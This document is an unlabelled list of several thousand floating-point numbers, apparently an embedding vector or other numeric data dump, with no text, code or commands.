0.01604263111948967, -0.02259092777967453, 0.04247317835688591, -0.004199148155748844, 0.005755939520895481, -0.011853953823447227, -0.008042258210480213, 0.0020123098511248827, -0.015875082463026047, 0.014325273223221302, 0.003012356348335743, -0.020217344164848328, 0.010199426673352718, 0.00755357975140214, -0.01357131078839302, 0.0030926393810659647, 0.01583319716155529, 0.017550554126501083, 0.01633583754301071, -0.010960369370877743, 0.024964511394500732, 0.00895678624510765, -0.0179135724902153, -0.030074695125222206, 0.01664300635457039, -0.04074185714125633, -0.022004513069987297, -0.0013211782788857818, 0.007330183405429125, -0.014395084232091904, -0.012021500617265701, 0.006495938636362553, 0.01208433136343956, 0.00812603160738945, 0.00913829542696476, -0.020706024020910263, 0.013955273665487766, -0.016810555011034012, 0.01767621375620365, -0.016712818294763565, 0.052246756851673126, 0.014339235611259937, -0.029935073107481003, -0.010415841825306416, 0.0025132058653980494, -0.04102110490202904, 0.00895678624510765, 0.010918483138084412, -0.0014128056354820728, -0.017061874270439148, 0.008530937135219574, -0.027170546352863312, -0.007131221238523722, -0.023526398465037346, -0.0040734875947237015, 0.023261114954948425, 0.003801223821938038, 0.015763385221362114, -0.0029058943036943674, 0.004586600698530674, -0.019770551472902298, -0.006555278319865465, 0.027393942698836327, -0.012175085954368114, 0.02166941948235035, 0.0033020731061697006, -0.013473575003445148, -0.01586112007498741, -0.008342446759343147, -0.008886975236237049, -0.006946221459656954, -0.01559583842754364, -0.025704510509967804, -0.014171687886118889, -0.0000751016559661366, -0.009857351891696453, 0.0007264735759235919, 0.014164706692099571, -0.016573196277022362, -0.014855838380753994, -0.0023840549401938915, -0.03976450115442276, -0.008314522914588451, -0.011239614337682724, 0.0054278261959552765, 0.08673352748155594, -0.014827914535999298, 0.0019180646631866693, 0.0009136550361290574, -0.006049146875739098, 0.009619993157684803, -0.023233192041516304, -0.015735460445284843, -0.029069414362311363, 0.004764619283378124, 0.04202638566493988, -0.02151583321392536, 0.01690828986465931, 0.009976030327379704, 0.0032776391599327326, 0.006604146212339401, 0.00435273302718997, -0.006017731502652168, 0.01565168797969818, 0.008803200908005238, 0.002366602187976241, 0.002687733853235841, 0.017341120168566704, -0.025830170139670372, 0.013431688770651817, -0.004684336483478546, -0.024531681090593338, -0.002539385110139847, -0.010855652391910553, -0.021683381870388985, -0.008077164180576801, -0.021264513954520226, 0.0022793379612267017, -0.007050938438624144, -0.0026318849995732307, 0.004768109880387783, 0.037279218435287476, -0.010171501897275448, -0.009606030769646168, -0.024182625114917755, 0.0005768156261183321, 0.0023316964507102966, -0.008105088956654072, -0.015539988875389099, 0.0003556011652108282, -0.011106973513960838, 0.03267167508602142, 0.007068391423672438, -0.00903357844799757, 0.011393199674785137, 0.004132827278226614, -0.004638959188014269, 0.013250179588794708, -0.008831125684082508, 0.000787558383308351, 0.02137621119618416, 0.023121492937207222, 0.009417540393769741, 0.010213389061391354, -0.008091126568615437, -0.02527168020606041, 0.007532636169344187, -0.014995461329817772, -0.001989621203392744, -0.014311310835182667, -0.004450468346476555, -0.002987922402098775, 0.00980848353356123, -0.021711304783821106, 0.03214110806584358, 0.006178297568112612, -0.008181881159543991, -0.01836036518216133, -0.012342632748186588, 0.009710747748613358, 0.034095823764801025, -0.009745653718709946, 0.02303772047162056, -0.012405462563037872, -0.015707535669207573, 0.03471016511321068, 0.03163846954703331, -0.019952060654759407, 0.027631301432847977, 0.0003392391372472048, 0.006677448283880949, -0.02503432147204876, -0.02125055156648159, -0.005316128488630056, -0.008803200908005238, 0.007309240289032459, -0.007839805446565151, 0.011323388665914536, -0.014241499826312065, 0.022269796580076218, 0.0068694292567670345, 0.0329788438975811, -0.024182625114917755, 0.004007167182862759, -0.00205768714658916, -0.009578106924891472, -0.001510541420429945, 0.0022985360119491816, -0.02432224713265896, -0.01922602392733097, 0.011777161620557308, -0.008893956430256367, 0.03973657637834549, -0.016405649483203888, 0.010813766159117222, -0.02682149037718773, -0.02077583409845829, 0.02009168453514576, -0.022716587409377098, 0.0067193349823355675, 0.020496590062975883, 0.006764712277799845, -0.018290553241968155, -0.01982640102505684, -0.010897539556026459, -0.007700183428823948, -0.020664136856794357, 0.023316964507102966, -0.009829427115619183, -0.007965466007590294, 0.009382635354995728, 0.005190467927604914, -0.037251293659210205, 0.032252807170152664, 0.012538104318082333, 0.03077280893921852, 0.01583319716155529, 0.009124333038926125, -0.025285642594099045, 0.02027319371700287, -0.015470177866518497, 0.022367531433701515, -0.010143578052520752, -0.013620179146528244, -0.006886881776154041, -0.027212433516979218, 0.0009599049808457494, 0.019993947818875313, -0.00183603644836694, 0.002867497969418764, 0.0008111197385005653, -0.014395084232091904, 0.008503013290464878, 0.021809041500091553, 0.00959904957562685, -0.01651734672486782, -0.030605262145400047, 0.003518488025292754, 0.03116375207901001, -0.01732715778052807, 0.018765270709991455, 0.028329413384199142, -0.007644334342330694, -0.00023190431238617748, -0.021180739626288414, -0.021320361644029617, 0.0034608938731253147, 0.0019547156989574432, -0.013236217200756073, -0.0012696925550699234, 0.026919227093458176, 0.02521583065390587, -0.03789355978369713, -0.013431688770651817, -0.0072533912025392056, 0.011714331805706024, 0.022967908531427383, 0.007365089375525713, 0.0007382542244158685, 0.03484978526830673, 0.020692061632871628, -0.011867916211485863, 0.02758941426873207, 0.01574942283332348, -0.015819234773516655, -0.0045272610150277615, 0.009326785802841187, 0.006181788165122271, -0.003178158076480031, 0.007260372396558523, -0.029935073107481003, 0.00892886146903038, 0.0094803711399436, -0.027519604191184044, 0.010464709252119064, 0.013934330083429813, 0.0325041264295578, -0.007609428837895393, -0.02842715010046959, -0.0026755169965326786, -0.0297954510897398, 0.02282828651368618, -0.009996973909437656, -0.004946128465235233, 0.022060362622141838, 0.0063353730365633965, 0.00463546859100461, -0.010771878995001316, -0.0037872614338994026, 0.008691503666341305, -0.02640262246131897, 0.013801688328385353, -0.009229050017893314, -0.015288668684661388, -0.015093197114765644, -0.0013220509281381965, 0.006255089771002531, 0.012566029094159603, -0.0008931479533202946, 0.007867730222642422, -0.00293556391261518, -0.009654899127781391, 0.0036406577564775944, -0.02366602048277855, -0.014136782847344875, -0.008489050902426243, -0.0026458471547812223, 0.008070182986557484, 0.011497916653752327, 0.020608287304639816, 0.01917017437517643, 0.024699227884411812, 0.0013063434744253755, -0.0036825446877628565, 0.019114326685667038, -0.01827659085392952, 0.0018831590423360467, 0.004282921552658081, -0.003979242406785488, 0.009948106482625008, -0.02175319194793701, -0.01824866607785225, -0.011672444641590118, -0.0071347118355333805, 0.02193470112979412, -0.005361505784094334, -0.029711676761507988, -0.044036950916051865, 0.003230516565963626, 0.004209619481116533, -0.00018270919099450111, 0.005825750529766083, -0.003275893861427903, 0.0040595256723463535, 0.017243383452296257, -0.008181881159543991, -0.012182067148387432, -0.007853767834603786, 0.00860074907541275, -0.010590369813144207, 0.011337350122630596, -0.011106973513960838, 0.0080073531717062, 0.02482488751411438, -0.015735460445284843, 0.014004141092300415, -0.02330300211906433, -0.006597165018320084, 0.019267911091446877, -0.024336209520697594, 0.020664136856794357, -0.03303469344973564, -0.00006424818275263533, 0.025076208636164665, 0.008070182986557484, 0.016154328361153603, -0.006188769359141588, 0.0029024037066847086, -0.021334324032068253, 0.0006592802237719297, -0.0022182532120496035, 0.004422544036060572, -0.014786027371883392, -0.0031031109392642975, -0.005015939939767122, -0.001234786817803979, 0.04889581352472305, 0.004261977970600128, -0.02351243607699871, 0.0034102806821465492, -0.009277918376028538, -0.024741115048527718, 0.007260372396558523, -0.02074790932238102, 0.013466594740748405, 0.0113094262778759, 0.013857537880539894, -0.001811602502129972, -0.025132058188319206, 0.014115839265286922, -0.0037069786339998245, -0.008398296311497688, 0.011002256534993649, -0.014590555801987648, -0.0011108719045296311, 0.007888673804700375, 0.0130686704069376, 0.029181111603975296, 0.001363065093755722, -0.005106694530695677, 0.017718100920319557, -0.031442996114492416, 0.00709980633109808, -0.014492820017039776, 0.004261977970600128, 0.015093197114765644, 0.008607730269432068, -0.02164149470627308, -0.037251293659210205, -0.006136410869657993, -0.004925185348838568, 0.018709421157836914, 0.006206221878528595, 0.001581225311383605, -0.0005641623283736408, 0.020887533202767372, -0.029097337275743484, -0.03761431202292442, -0.009508294984698296, -0.002041979692876339, -0.0179135724902153, 0.018081119284033775, 0.002293300349265337, -0.008537918329238892, -0.02354036085307598, 0.010841690935194492, 0.015512065030634403, 0.029181111603975296, -0.009068484418094158, -0.0038291483651846647, -0.0022793379612267017, 0.02161356993019581, -0.0013927348190918565, 0.006206221878528595, -0.004136317875236273, -0.026053566485643387, 0.019979985430836678, -0.002054196782410145, 0.013536405749619007, 0.020817721262574196, -0.004593581892549992, 0.0074558439664542675, -0.007351126987487078, -0.005829241126775742, -0.024517718702554703, -0.011616596020758152, -0.01128150150179863, -0.020943380892276764, 0.021236589178442955, 0.024936586618423462, 0.024029038846492767, 0.019533194601535797, -0.0008023933041840792, 0.00945244636386633, -0.030353941023349762, 0.0036581107415258884, -0.004429525230079889, 0.00022841375903226435, -0.008426220156252384, 0.022283757105469704, 0.00723942881450057, -0.02077583409845829, 0.021180739626288414, 0.0032095732167363167, -0.01717357337474823, -0.004160751588642597, -0.0007657423848286271, 0.01738300733268261, 0.0016466734232380986, -0.015121121890842915, 0.006251599173992872, 0.01654527150094509, 0.011302445083856583, -0.025285642594099045, 0.0013866263907402754, -0.0011501406552270055, -0.006021222099661827, 0.006157353986054659, 0.01486980076879263, -0.013054708018898964, -0.0032479693181812763, -0.010555463843047619, 0.020580362528562546, -0.003558629658073187, -0.0044434876181185246, -0.02253507822751999, 0.011162822134792805, 0.022953946143388748, 0.020845646038651466, -0.0002136879338650033, -0.004750656895339489, 0.007818862795829773, 0.011595652438700199, -0.008056220598518848, -0.021236589178442955, 0.0022671211045235395, 0.016391687095165253, -0.00008835489279590547, 0.012000557966530323, 0.02708677388727665, 0.010848671197891235, 0.009152257815003395, -0.011190746910870075, 0.04244525358080864, 0.0015157771995291114, 0.003506271168589592, 0.006035184487700462, -0.011567727662622929, -0.021446023136377335, -0.016000743955373764, -0.001544574392028153, -0.012321689166128635, 0.024545643478631973, -0.009529238566756248, -0.006789145991206169, 0.0038361293263733387, 0.001952970284037292, -0.027729036286473274, -0.044958457350730896, 0.008656597696244717, -0.0325041264295578, 0.02387545444071293, -0.016796592622995377, 0.002658064244315028, -0.0004978416254743934, 0.01415074523538351, 0.0074558439664542675, 0.013257160782814026, -0.02211621031165123, 0.00038374384166672826, 0.01318734884262085, -0.005878109019249678, -0.002914620563387871, -0.015302631072700024, 0.02053847536444664, 0.023079605773091316, -0.03624601289629936, -0.020077722147107124, -0.012475274503231049, -0.016740743070840836, -0.015916969627141953, -0.02985130064189434, -0.0037383935414254665, -0.001973913749679923, -0.00660763680934906, 0.0015079234726727009, 0.0030908940825611353, 0.001271437737159431, 0.016587158665060997, -0.015916969627141953, -0.000976485142018646, -0.007881692610681057, 0.010883577167987823, -0.020482627674937248, 0.0055779204703867435, 0.029990922659635544, -0.012614896520972252, 0.015484140254557133, 0.020524512976408005, 0.005986316595226526, -0.005225373897701502, -0.0039582992903888226, 0.020482627674937248, 0.0012286783894523978, -0.02432224713265896, 0.01872338354587555, 0.011672444641590118, 0.01678263023495674, 0.008105088956654072, -0.011511879041790962, -0.027687150985002518, -0.0036127332132309675, -0.020412815734744072, 0.013124519027769566, -0.01042980421334505, -0.011504897847771645, 0.011393199674785137, 0.004897260572761297, -0.008803200908005238, -0.01068810559809208, 0.02280036173760891, 0.010366973467171192, 0.013054708018898964, 0.007525654975324869, 0.00013449578545987606, 0.005518581252545118, 0.0019198099616914988, -0.010171501897275448, 0.010164521634578705, -0.004656411707401276, 0.0074558439664542675, 0.011867916211485863, 0.0063667879439890385, 0.016391687095165253, -0.03476601466536522, -0.011358293704688549, -0.021236589178442955, 0.012182067148387432, 0.0017199752619490027, -0.0017644799081608653, -0.02414073795080185, -0.006604146212339401, 0.01866753399372101, 0.01688036508858204, -0.010283200070261955, -0.01128150150179863, -0.009738672524690628, -0.015246781520545483, -0.011826029047369957, 0.02032904326915741, 0.012607915326952934, 0.005148581229150295, -0.006590183824300766, -0.01396225392818451, -0.013061689212918282, 0.010799803771078587, -0.00008224640623666346, -0.0050613172352313995, -0.014353197067975998, -0.004733204375952482, 0.01688036508858204, 0.01972866617143154, 0.012768481858074665, -0.005103203933686018, 0.0005275114090181887, 0.013599235564470291, -0.012377538718283176, -0.00895678624510765, 0.006722825579345226, 0.006021222099661827, 0.0026545736473053694, -0.0029809412080794573, -0.010806784965097904, -0.015944894403219223, -0.015246781520545483, -0.002394526731222868, -0.003073441330343485, 0.01285923644900322, 0.002745328238233924, 0.0011833010939881206, -0.01788564771413803, -0.016000743955373764, -0.002398017095401883, 0.0019355175318196416, 0.0037663180846720934, 0.02672375552356243, -0.0019215552601963282, -0.00938961561769247, -0.010115653276443481, 0.017243383452296257, -0.00023059535305947065, 0.014290367253124714, -0.017215460538864136, -0.010555463843047619, -0.0024119794834405184, -0.003696506842970848, 0.010855652391910553, 0.007804900407791138, -0.0037069786339998245, 0.013892442919313908, 0.025313567370176315, 0.004007167182862759, 0.015302631072700024, 0.02014753222465515, -0.014353197067975998, -0.018109044060111046, 0.016978101804852486, 0.013515462167561054, -0.007895654998719692, -0.01324319839477539, 0.015093197114765644, 0.006806598976254463, -0.01845810003578663, 0.004450468346476555, 0.008195843547582626, 0.0027523094322532415, -0.001172829419374466, -0.01866753399372101, 0.00481348717585206, -0.014115839265286922, -0.013606216758489609, -0.004251506645232439, -0.006743768695741892, -0.023442624136805534, -0.017997344955801964, 0.011609614826738834, 0.012929047457873821, -0.02321922965347767, -0.011469991877675056, -0.01696413941681385, -0.020454702898859978, 0.005567449145019054, -0.025913944467902184, 0.00009795393998501822, 0.020105646923184395, -0.011595652438700199, 0.015302631072700024, 0.01533055491745472, -0.004412072245031595, 0.02827356569468975, 0.013152443803846836, 0.014786027371883392, 0.03214110806584358, -0.004453958943486214, -0.022186022251844406, -0.0011169803328812122, -0.012908103875815868, 0.011358293704688549, 0.020692061632871628, 0.0039094313979148865, -0.016182253137230873, 0.008838106878101826, 0.011805086396634579, -0.0027523094322532415, -0.038172803819179535, -0.001993111800402403, -0.0009651408181525767, -0.01419961266219616, -0.006670467089861631, 0.00892886146903038, -0.007930560037493706, 0.013613197952508926, -0.014506782405078411, -0.002855281112715602, 0.010834709741175175, 0.01149093545973301, -0.0015210130950435996, -0.003104856237769127, 0.0044749025255441666, -0.014520744793117046, 0.014353197067975998, -0.023735832422971725, -0.0028151394799351692, -0.0034643844701349735, 0.004698298405855894, -0.01627998799085617, -0.01296395342797041, -0.006349334958940744, -0.0021048097405582666, -0.032336581498384476, -0.005277731921523809, 0.014646404422819614, -0.00268947915174067, -0.016531309112906456, 0.009047540836036205, -0.008133012801408768, 0.013278103433549404, 0.0005807424895465374, 0.012140179984271526, 0.008838106878101826, -0.02929280884563923, 0.011295463889837265, 0.011721312068402767, -0.0005999405984766781, 0.015428290702402592, 0.01128150150179863, 0.006967165041714907, 0.010555463843047619, 0.005249807611107826, 0.0013525934191420674, 0.014562631025910378, -0.012775463052093983, 0.0018691967707127333, 0.006523863412439823, 0.0005131128709763288, -0.010632256977260113, 0.011428105644881725, -0.006663485895842314, 0.009229050017893314, 0.0059618824161589146, -0.014115839265286922, -0.00878225825726986, -0.004537732806056738, -0.031778089702129364, -0.007197542116045952, -0.0038535823114216328, -0.004254997242242098, -0.010988294146955013, -0.010353012010455132, 0.004666883498430252, -0.011763199232518673, -0.010101690888404846, -0.017494704574346542, 0.004579619504511356, 0.001486107474192977, 0.03080073371529579, -0.0027732527814805508, 0.007860749028623104, 0.01275451947003603, 0.005504618864506483, -0.036385633051395416, 0.0046599023044109344, 0.02175319194793701, 0.0040734875947237015, -0.0029425451066344976, 0.0006091033574193716, -0.00019503524526953697, 0.006590183824300766, -0.010625275783240795, -0.009438483975827694, 0.014702253974974155, 0.017299233004450798, 0.002785469638183713, -0.004768109880387783, -0.021836966276168823, -0.004415562842041254, -0.005211411509662867, 0.009305842220783234, -0.007176598533987999, 0.009759616106748581, 0.019519232213497162, 0.01845810003578663, -0.011058105155825615, 0.010995275340974331, 0.0023805643431842327, -0.01345263235270977, 0.025173945352435112, -0.004146789666265249, -0.011379237286746502, 0.00811207015067339, 0.020259231328964233, -0.015553951263427734, -0.016768667846918106, -0.01574942283332348, -0.008188862353563309, 0.015135083347558975, 0.011267539113759995, 0.02432224713265896, -0.004555185325443745, -0.00002572927223809529, -0.009899238124489784, 0.007413957267999649, -0.01399017870426178, -0.01949130743741989, 0.006879901047796011, 0.03780978545546532, 0.009466408751904964, -0.009550182148814201, -0.008356409147381783, 0.01187489740550518, -0.0037418841384351254, 0.006342354230582714, 0.020733946934342384, -0.016894327476620674, 0.021655457094311714, -0.006328391842544079, 0.005818769335746765, -0.00614688266068697, 0.013333952985703945, 0.009633955545723438, -0.012098293751478195, 0.002846554620191455, -0.004415562842041254, -0.0019634419586509466, -0.003110092133283615, -0.008803200908005238, 0.015121121890842915, 0.008021315559744835, 0.02511809580028057, 0.005619807168841362, 0.00867754127830267, 0.0162520632147789, -0.012852255254983902, -0.004035091493278742, -0.020133571699261665, 0.0017766968812793493, -0.014646404422819614, 0.03577129542827606, -0.006443580612540245, -0.016238102689385414, 0.019519232213497162, 0.0028046679217368364, -0.02693318948149681, -0.01806715689599514, -0.016391687095165253, 0.013410745188593864, 0.000709457031916827, -0.017536591738462448, -0.017494704574346542, 0.03613431379199028, 0.024070926010608673, 0.009801502339541912, -0.0003791624621953815, 0.014981498941779137, -0.014185650274157524, -0.0027959414292126894, -0.011351312510669231, 0.021529795601963997, -0.011923764832317829, 0.008907917886972427, -0.009501313790678978, -0.013696971349418163, 0.02122262679040432, -0.0023700927849859, -0.01898866519331932, -0.009633955545723438, -0.043171290308237076, -0.013738858513534069, -0.0042933933436870575, 0.00962697435170412, 0.019519232213497162, 0.00667395768687129, 0.009096408262848854, 0.004638959188014269, -0.00744886277243495, -0.02264677733182907, 0.01153282169252634, -0.026919227093458176, 0.012286784127354622, -0.029544129967689514, -0.00526726059615612, -0.007197542116045952, 0.011023200117051601, 0.035045258700847626, -0.007162636611610651, -0.0000647390479571186, 0.012014519423246384, 0.0001978713262360543, -0.01533055491745472, -0.0028605167753994465, -0.009187163785099983, 0.01254508551210165, 0.01675470545887947, -0.017103761434555054, 0.0036650917027145624, -0.005302166100591421, -0.010073766112327576, -0.008537918329238892, -0.027310170233249664, -0.009508294984698296, -0.003808204783126712, 0.006831033155322075, -0.01535847969353199, -0.024978473782539368, 0.030381865799427032, -0.005591882858425379, -0.0014669093070551753, 0.005197449121624231, 0.0009023107122629881, 0.019365645945072174, -0.018053194507956505, -0.005068298429250717, -0.006743768695741892, 0.0021379701793193817, -0.02303772047162056, 0.017969422042369843, 0.004000185988843441, 0.003319525858387351, -0.014053009450435638, 0.028706394135951996, 0.0003896341659128666, 0.011358293704688549, -0.02887394279241562, -0.011407162062823772, 0.005944429896771908, 0.012489236891269684, -0.007497730664908886, 0.0374467670917511, -0.0239033792167902, -0.014157725498080254, -0.0027435829397290945, 0.0059304675087332726, 0.004310845863074064, -0.006464523728936911, -0.004806505981832743, -0.013438669964671135, -0.0189607422798872, 0.01815093122422695, 0.023163380101323128, -0.001277546281926334, 0.0044958461076021194, -0.0018901402363553643, -0.008921880275011063, -0.009536219760775566, -0.005155562423169613, 0.0208596084266901, -0.0011370510328561068, 0.01187489740550518, -0.0026790075935423374, 0.0038640538696199656, -0.008649616502225399, -0.006419146433472633, 0.0007068391423672438, -0.0016414375277236104, -0.028790168464183807, 0.009529238566756248, 0.002219998510554433, 0.0014756357995793223, 0.02545318938791752, 0.03029809147119522, 0.007644334342330694, 0.02372187003493309, 0.010981312952935696, -0.0036127332132309675, 0.01827659085392952, 0.010339049622416496, -0.013285084627568722, 0.012091312557458878, -0.0019075929885730147, -0.00706141022965312, -0.012614896520972252, 0.006694900803267956, -0.008286598138511181, -0.034402996301651, 0.00844018254429102, -0.007274334318935871, 0.001884904340840876, 0.013166406191885471, 0.00927093718200922, 0.031861864030361176, -0.010366973467171192, -0.02106904238462448, -0.013787725940346718, -0.015176970511674881, -0.0033107995986938477, -0.00456914771348238, 0.023372814059257507, 0.0005161670851521194, -0.006157353986054659, -0.003405044786632061, -0.00183603644836694, -0.011372256092727184, -0.0074698058888316154, 0.00011344331869622692, -0.005926976911723614, -0.012635840103030205, 0.005036883056163788, 0.02455960586667061, 0.024769039824604988, -0.04079770669341087, 0.0036685822997242212, 0.006227165460586548, -0.031833939254283905, -0.011853953823447227, 0.004101412370800972, -0.00870546605437994, -0.013375839218497276, -0.002202545525506139, -0.014367159456014633, 0.007372070103883743, -0.0012993622804060578, 0.004230563063174486, 0.0020367437973618507, -0.007155655417591333, 0.00034032994881272316, 0.023526398465037346, -0.0017784421797841787, 0.002846554620191455, 0.006509901024401188, -0.022674700245261192, 0.009340748190879822, 0.0053649963811039925, -0.009284899570047855, 0.021362248808145523, -0.04911921173334122, -0.018346402794122696, 0.013578291982412338, 0.011546784080564976, 0.012447349727153778, 0.0030629695393145084, -0.009438483975827694, -0.00892886146903038, -0.012984897010028362, -0.0013229235773906112, 0.002972214948385954, -0.012803386896848679, -0.02351243607699871, 0.033202242106199265, -0.01162357721477747, -0.005543014965951443, 0.004317827057093382, -0.014073952101171017, -0.02342866361141205, 0.01956111751496792, 0.01982640102505684, -0.012112255208194256, 0.013159424997866154, -0.02056640014052391, -0.01391338650137186, -0.010206407867372036, -0.012789425440132618, -0.002352639799937606, -0.00007575613562949002, 0.010185464285314083, -0.010387917049229145, 0.009976030327379704, -0.017634326592087746, 0.005644241347908974, 0.016978101804852486, 0.004021129105240107, 0.0012452586088329554, -0.007763013243675232, 0.00024521208251826465, -0.004234053660184145, -0.014213575050234795, -0.006321410648524761, -0.017704138532280922, -0.014185650274157524, -0.007029994856566191, -0.01058338861912489, -0.01937960833311081, -0.011134898290038109, -0.007281315512955189, -0.029236961156129837, 0.007427919190376997, -0.004139808472245932, 0.02821771614253521, -0.024713190272450447, 0.00019874396093655378, 0.00952225737273693, 0.009103389456868172, -0.010143578052520752, -0.003268912900239229, -0.010450747795403004, -0.01956111751496792, -0.002769762184470892, 0.01075791660696268, 0.0035533937625586987, -0.010108672082424164, -0.017718100920319557, 0.015037347562611103, -0.01767621375620365, -0.021124890074133873, -0.00328462035395205, -0.012936028651893139, 0.006070089992135763, -0.0025201868265867233, 0.0038884878158569336, -0.01510715950280428, 0.015916969627141953, -0.0036057522520422935, -0.007029994856566191, -0.006021222099661827, 0.01780187338590622, 0.01138621848076582, -0.014032065868377686, 0.009661880321800709, -0.030465638265013695, 0.016377724707126617, 0.010248295031487942, 0.004303865134716034, -0.013578291982412338, 0.028706394135951996, -0.00256730942055583, -0.001013136119581759, 0.0021606588270515203, 0.0013473575236275792, -0.016000743955373764, -0.042221855372190475, -0.021571682766079903, 0.007309240289032459, 0.008146975189447403, 0.040015820413827896, -0.007176598533987999, 0.008377352729439735, -0.007162636611610651, 0.0072533912025392056, -0.0008215914131142199, -0.009675842709839344, 0.03359318524599075, -0.005696599837392569, -0.012817349284887314, -0.009019616059958935, -0.01970074139535427, 0.009592068381607533, 0.01197961438447237, 0.016377724707126617, -0.010792822577059269, 0.017159610986709595, 0.014758102595806122, -0.010415841825306416, 0.004736694972962141, -0.0006091033574193716, 0.02603960409760475, 0.003857072675600648, -0.0030594789423048496, -0.00959904957562685, 0.00916622020304203, 0.0043073552660644054, 0.024308284744620323, 0.002729620784521103, -0.004429525230079889, 0.012265840545296669, 0.01595885679125786, 0.015190932899713516, -0.010660180822014809, 0.015037347562611103, 0.003923393320292234, -0.0040734875947237015, -0.0077909380197525024, -0.01696413941681385, 0.009187163785099983, 0.010729992762207985, 0.0041747139766812325, -0.0059130145236849785, -0.009473389945924282, -0.012593953870236874, 0.028734318912029266, 0.0262769628316164, -0.006974146235734224, 0.0075186737813055515, 0.012705651111900806, 0.01633583754301071, 0.001231296337209642, 0.00870546605437994, -0.013997159898281097, 0.000979975680820644, -0.00101924454793334, 0.0028570264112204313, 0.008789239451289177, 0.01701998896896839, 0.012126217596232891, -0.021320361644029617, -0.016615083441138268, -0.0018901402363553643, 0.008761314675211906, -0.009592068381607533, 0.02098526805639267, -0.00281339418143034, -0.004007167182862759, -0.009326785802841187, -0.01267772726714611, -0.0015899516874924302, 0.0113094262778759, -0.04023921862244606, -0.0018081119051203132, -0.013641122728586197, 0.013564330525696278, 0.022995833307504654, 0.012705651111900806, -0.012684708461165428, 0.018793193623423576, -0.016531309112906456, -0.004185185767710209, -0.006509901024401188, -0.006789145991206169, -0.018527911975979805, 0.012482255697250366, -0.01466036681085825, -0.020245268940925598, 0.011449048295617104, -0.012433387339115143, -0.019993947818875313, -0.00018249102868139744, 0.017103761434555054, -0.022451305761933327, 0.01141414325684309, -0.0007059664931148291, -0.002410234184935689, -0.019030552357435226, 0.004049053881317377, -0.00916622020304203, 0.0031921204645186663, 0.009152257815003395, -0.001516649848781526, 0.0013717914698645473, 0.013669046573340893, 0.018262628465890884, -0.002110045636072755, -0.0003401117864996195, 0.0025306586176156998, -0.010785841383039951, 0.017187535762786865, -0.014981498941779137, -0.000016266571037704125, -0.006045656278729439, -0.011079048737883568, -0.003275893861427903, 0.033258091658353806, -0.004460940137505531, 0.022130172699689865, 0.010792822577059269, 0.011183765716850758, -0.016238102689385414, -0.014136782847344875, 0.001403206610120833, -0.003783770836889744, -0.00014725814980920404, -0.011351312510669231, 0.006621599197387695, 0.0022095267195254564, 0.004024619702249765, -0.02666790597140789, 0.019966023042798042, 0.012817349284887314, -0.012119236402213573, -0.012237915769219398, -0.011784142814576626, 0.009857351891696453, -0.003497544676065445, -0.02140413597226143, 0.0038884878158569336, -0.016796592622995377, 0.022395456209778786, 0.006911315955221653, 0.01630791276693344, -0.0022391965612769127, -0.014290367253124714, -0.02356828562915325, -0.0003401117864996195, 0.024461869150400162, 0.003930374514311552, -0.006810089573264122, -0.0010524048702791333, -0.014087914489209652, -0.0018744326662272215, -0.0035481578670442104, -0.006139901466667652, 0.008056220598518848, -0.003783770836889744, -0.001977404346689582, 0.004258487373590469, 0.0005960137350484729, -0.008558861911296844, -0.026151303201913834, -0.027547527104616165, 0.005843203514814377, -0.012503198347985744, -0.011853953823447227, -0.007162636611610651, -0.00702301412820816, 0.0014171687653288245, -0.0379214845597744, 0.02377771958708763, 0.01803923211991787, 0.0037418841384351254, -0.013159424997866154, 0.016615083441138268, 0.008991692215204239, 0.015260743908584118, 0.0015149045502766967, 0.01782979816198349, 0.013208292424678802, 0.020636212080717087, 0.0053649963811039925, 0.0012810368789359927, -0.006272542756050825, -0.006635561585426331, -0.0030594789423048496, 0.0002879714884329587, -0.01120470929890871, 0.002900658408179879, 0.0061015053652226925, 0.019030552357435226, 0.01669885590672493, 0.0005131128709763288, -0.0017540082335472107, -0.013710933737456799, -0.03127545118331909, -0.006436599418520927, 0.018206778913736343, 0.018583759665489197, -0.005312637891620398, -0.009249993599951267, 0.015428290702402592, 0.005173015408217907, -0.005581411067396402, -0.013459613546729088, -0.016405649483203888, -0.016447534784674644, 0.00015609363617841154, 0.01699206419289112, 0.005940939299762249, -0.0045447140000760555, -0.011295463889837265, -0.016363762319087982, -0.006555278319865465, 0.0066181086003780365, -0.007274334318935871, 0.016112441197037697, -0.00590952392667532, 0.02658413164317608, -0.0010148814180865884, -0.017313195392489433, -0.000865659792907536, 0.002658064244315028, 0.006733297370374203, 0.008579805493354797, 0.011037162505090237, 0.00695669325068593, -0.0006714971968904138, 0.0007818862213753164, -0.0016937960172072053, -0.012447349727153778, 0.009277918376028538, 0.014290367253124714, 0.022521115839481354, 0.008251692168414593, -0.0025742906145751476, -0.000992192653939128, 0.021348286420106888, 0.012447349727153778, -0.01363414153456688, 0.018262628465890884, -0.024573568254709244, 0.02232564426958561, -0.0007744688191451132, 0.002078630728647113, -0.01114885974675417, -0.010143578052520752, 0.01643357425928116, 0.0005052590859122574, 0.013899424113333225, -0.00878225825726986, 0.010939426720142365, -0.002312498399987817, 0.020077722147107124, 0.022367531433701515, 0.004038582090288401, 0.004830940160900354, -0.011190746910870075, 0.009829427115619183, -0.0024172153789550066, 0.019672816619277, -0.042640723288059235, 0.017550554126501083, -0.005853675305843353, 0.004035091493278742, 0.0015489376382902265, -0.0006544806528836489, 0.04462336376309395, 0.0003924702468793839, -0.013040745630860329, -0.020524512976408005, 0.020245268940925598, 0.01732715778052807, 0.004160751588642597, 0.013759802095592022, -0.009215087629854679, -0.0016370742814615369, 0.003288110950961709, 0.0017060129903256893, 0.0060316938906908035, -0.004666883498430252, 0.015498102642595768, 0.002809903584420681, -0.02330300211906433, 0.0035481578670442104, 0.0025044793728739023, -0.016168290749192238, 0.0167267806828022, -0.012300746515393257, 0.003881506621837616, -0.014339235611259937, 0.0057489583268761635, -0.0009380889823660254, -0.010897539556026459, -0.0025376398116350174, -0.02298187091946602, 0.0018534893169999123, 0.0028936772141605616, 0.005351033993065357, -0.00667395768687129, 0.029125262051820755, -0.00450282683596015, -0.006195750553160906, -0.00839131511747837, -0.0006457542767748237, 0.003385846735909581, 0.020733946934342384, -0.0022461777552962303, 0.0007181834662333131, 0.014255461283028126, -0.009326785802841187, 0.016866402700543404, 0.014772064983844757, -0.013019802048802376, -0.024601493030786514, -0.02408488839864731, 0.009983011521399021, -0.009989992715418339, -0.00428641214966774, -0.0238056443631649, 0.006754240486770868, -0.01535847969353199, 0.029488280415534973, 0.012223953381180763, -0.0012112255208194256, 0.03423544764518738, 0.009263955987989902, -0.003951318096369505, -0.032783374190330505, -0.004275940358638763, 0.010499615222215652, 0.02419658750295639, 